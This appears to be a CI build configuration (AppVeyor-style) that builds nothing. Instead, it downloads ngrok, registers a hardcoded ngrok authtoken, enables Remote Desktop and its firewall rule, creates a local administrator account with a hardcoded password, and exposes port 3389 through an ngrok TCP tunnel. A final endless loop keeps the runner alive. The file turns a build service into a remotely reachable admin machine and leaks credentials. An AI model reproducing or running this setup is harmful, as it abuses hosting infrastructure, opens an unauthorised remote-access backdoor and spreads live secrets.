version: 1.0.{build}

build_script:
  - powershell -Command "Invoke-WebRequest https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-windows-amd64.zip -OutFile ngrok.zip -UseBasicParsing"
  - powershell -Command "Expand-Archive ngrok.zip -DestinationPath ngrok -Force"
  - powershell -Command ".\\ngrok\\ngrok.exe authtoken 2nyiyWrhpT6OwyUoaoZ2zdE9nNo_7KtHBQxaox3Wx2t9qBHTT"
  - powershell -Command "Set-ItemProperty -Path 'HKLM:\\System\\CurrentControlSet\\Control\\Terminal Server' -Name 'fDenyTSConnections' -Value 0"
  - powershell -Command "Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'"
  - powershell -Command "Set-ItemProperty -Path 'HKLM:\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp' -Name 'UserAuthentication' -Value 1"
  - net user admin Binhminh12 /add
  - net localgroup Administrators admin /add
  - powershell -Command "wmic useraccount where 'name=\"admin\"' set PasswordExpires=false"
  - start /b .\ngrok\ngrok.exe tcp 3389 >nul 2>&1
  - powershell -Command "while ($true) { Write-Host '💤 still breathing...'; Start-Sleep -Seconds 2 }"
